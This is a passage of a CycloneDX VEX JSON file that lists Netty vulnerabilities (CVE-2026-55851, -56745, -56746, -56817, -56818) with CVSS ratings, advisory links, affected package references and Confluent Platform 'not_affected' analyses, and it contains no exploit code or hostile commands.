          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f46bd9c5-bbb4-4905-a7e5-87b2cdfa4b07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#df1f0e67-c2af-4b0a-bc27-0a1d04477689"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb09ca96-2de8-4848-83ef-0df6c1b392fe"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#e987c11d-07b4-49db-ab1c-0a2f02c125fe"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#72448050-828a-4fa4-af95-d1e062179c95"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d612726f-976c-49db-8573-9ddb341ea8ba"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#8ce216c4-3956-4ece-9ac2-5db5191ada51"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e89047a4-0a3b-4cfb-88c0-ceca6523232d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-55851",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final up to (but not including) 4.2.16.Final, and 4.1.0.Final up to (but not including) 4.1.135, the `HAProxyMessageDecoder` in Netty's `codec-haproxy` module performs protocol version detection by reading the 13th byte as a signed Java `byte` and widening it to `int` without masking; a PROXY protocol v2 binary prefix followed by version byte `0xFF` sign-extends to `-1`, collides with the decoder's need-more-data sentinel, and causes `ByteToMessageDecoder` to accumulate inbound bytes in an unbounded `cumulation` buffer until direct memory is exhausted. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-haproxy to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55851"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55851"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-q6cq-mhr2-jmr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55851"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55851"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:48:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#f3a3c0ba-128a-4930-b392-bd3c965a2d91"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#ef7f4f9f-98ff-4b34-add2-bdecaf246392"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#9c549336-282b-483c-84bd-2fcf3f772647"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f43b8b71-ced6-44cc-bab3-b6d233fd5b07"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#93960962-02f2-44f6-b796-d503c9207f2d"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#c70a7036-032f-44d9-a030-0ccc9df17a5c"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#fcddbfef-dd62-4a27-add9-d27c73f5eb82"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f91053db-75e5-48e1-b89d-fc9fff022d0c"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#d41885c5-4e8a-4fc4-8fe5-351ba1848ee8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e6988e38-6131-41ad-870b-699bcf8b15a0"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#4be3db44-1326-4438-8b49-68205b3d2132"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only genuine wiring of the HAProxy decoder anywhere in the CP repo set is exclusively Confluent Cloud infrastructure that is not shipped with Confluent Platform."
      }
    },
    {
      "id": "CVE-2026-56745",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, the `SpdyHttpDecoder` handler in Netty's SPDY-to-HTTP codec allocates a pooled `ByteBuf` when processing a client-initiated `SYN_STREAM` frame with `FLAG_FIN=0` and stores the partially constructed `FullHttpRequest` in `messageMap`; when the remote peer sends `RST_STREAM` for that stream or the accumulated content exceeds `maxContentLength`, the decoder removes the entry but does not release the pooled `ByteBuf`, causing native memory exhaustion. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56745"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56745"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-jppx-w49h-x2qq"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56745"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56745"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:46:55+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#59482894-99d8-4e97-9ad6-82555a5a8f66"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#e9270d8f-ac37-46a9-ba4d-bccbb3434099"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#efded87b-2e1f-45f1-b20f-daf47fabfdd6"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#d664916f-0188-4c6d-976a-a95e5b004984"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#b5155b1d-7e63-430d-9004-8520ee029169"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c755cc34-3f6d-447c-b113-46440a5e6657"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#b516514f-e0f6-44e9-b5f5-2db4c89a2fa9"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ecd9c6d7-21be-4329-8bd2-64415b7c67e8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f50d8d8f-9f83-4d24-a8be-069154322809"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fba45fa2-71ff-40da-bbb8-a08bd44cf523"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#bab7766f-9268-4e06-a706-63ef52378b94"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#ffd958be-72a4-4c81-b800-2b6b152841a3"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f46bd9c5-bbb4-4905-a7e5-87b2cdfa4b07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#df1f0e67-c2af-4b0a-bc27-0a1d04477689"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb09ca96-2de8-4848-83ef-0df6c1b392fe"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#e987c11d-07b4-49db-ab1c-0a2f02c125fe"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#72448050-828a-4fa4-af95-d1e062179c95"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d612726f-976c-49db-8573-9ddb341ea8ba"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#8ce216c4-3956-4ece-9ac2-5db5191ada51"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e89047a4-0a3b-4cfb-88c0-ceca6523232d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-56746",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        284
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, are vulnerable to security control bypass during the origin evaluation process. CorsHandler provides a shortCircuit() configuration designed to reject unauthorized cross-origin requests immediately, acting as a security control before requests reach the application. However, due to a logical operator error in the origin evaluation process, this protection can be entirely bypassed. An attacker can bypass the short-circuit mechanism by sending a request with an Origin: null header. This failure forwards unauthorized requests to the backend application, bypassing intended access controls. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56746"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56746"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-6cqp-g7gg-8hr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56746"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56746"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:47:53+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#59482894-99d8-4e97-9ad6-82555a5a8f66"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#e9270d8f-ac37-46a9-ba4d-bccbb3434099"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#efded87b-2e1f-45f1-b20f-daf47fabfdd6"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#d664916f-0188-4c6d-976a-a95e5b004984"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#b5155b1d-7e63-430d-9004-8520ee029169"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c755cc34-3f6d-447c-b113-46440a5e6657"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#b516514f-e0f6-44e9-b5f5-2db4c89a2fa9"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ecd9c6d7-21be-4329-8bd2-64415b7c67e8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f50d8d8f-9f83-4d24-a8be-069154322809"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fba45fa2-71ff-40da-bbb8-a08bd44cf523"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#bab7766f-9268-4e06-a706-63ef52378b94"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#ffd958be-72a4-4c81-b800-2b6b152841a3"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f46bd9c5-bbb4-4905-a7e5-87b2cdfa4b07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#df1f0e67-c2af-4b0a-bc27-0a1d04477689"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb09ca96-2de8-4848-83ef-0df6c1b392fe"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#e987c11d-07b4-49db-ab1c-0a2f02c125fe"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#72448050-828a-4fa4-af95-d1e062179c95"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d612726f-976c-49db-8573-9ddb341ea8ba"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#8ce216c4-3956-4ece-9ac2-5db5191ada51"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e89047a4-0a3b-4cfb-88c0-ceca6523232d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56817",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        611
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, any caller that can deliver bytes to a Netty channel pipeline containing `XmlDecoder` can send XML with a `DOCTYPE` declaration to an `AsyncXMLInputFactory` instantiated with no security configuration, leaving DTD and entity handling active depending on Aalto XML async parser behavior and creating conditional XML external entity risk. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-xml to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56817"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56817"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-4qhr-g3c6-fcfx"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56817"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56817"
        }
      ],
      "published": "2026-07-21T23:17:52+00:00",
      "updated": "2026-07-30T14:48:18+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-xml@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-xml@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#d14b7302-5dce-4bdf-9831-0a334d9ce0a6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#e748e892-9caa-41ab-87bd-435a4fc262a2"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#dd085405-277c-4d54-8fa6-1f2af0ccfbaa"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ae7e4b17-3f2e-4ca6-a310-80be12c1c120"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#8cf7afe2-0e33-47c5-aa9c-44b97bdc5563"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#cca7f866-2709-4ae3-8177-02514ef1ddb9"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#f438b2a1-0042-4b82-819b-831c1de90cac"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#c0090766-ef21-4c63-8500-0c8cec9e36c9"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#f6d50807-7e62-4f3e-8981-14e0b8c23023"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#5c6f36d1-4d87-497d-84fd-1e2f7bce1436"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#ee317a88-e6fc-45b7-936d-a240c8fa2281"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56818",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        401,
        703
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, the RedisArrayAggregator Redis codec clears retained partial aggregate state when the maxNestedArrayDepth limit is exceeded, but it does not clear the same state when the sibling maxElements limit is exceeded. A peer can start a valid RESP array, send a bulk string child, then send a nested array header longer than the configured maxElements. Netty throws a decoder exception in decodeRedisArrayHeader, but the existing partial aggregate remains retained in the handler. If the application leaves the channel alive after the exception, later messages are still consumed into the pre-error aggregate, allowing an unauthenticated peer to keep attacker-controlled aggregate state alive across a security-limit exception and pin retained pooled buffers. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-redis to version 4.1.136.Final, 4.2.16.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56818"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-p9jm-q85p-7mcp"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56818"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56818"
        }
      ],
      "published": "2026-08-07T18:17:19+00:00",
      "updated": "2026-08-08T04:17:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-redis@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-redis@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#d6156a21-b295-4d6b-8e00-1d9cb4470e13"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#b0af7fa5-c69a-4042-87b9-ffaba9bd796c"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c738d546-3798-4fb8-9b2c-c1d25f6acd8a"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#a8f8d17d-d7dd-4b95-951f-b522b41b1740"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#e698bc7a-be13-4856-aded-49439d9809ec"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#9e95319f-9b63-4175-b797-d39f82017b59"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#94cd0f4e-f3d0-4c14-9820-a4b5fdc900d8"
        },
        {
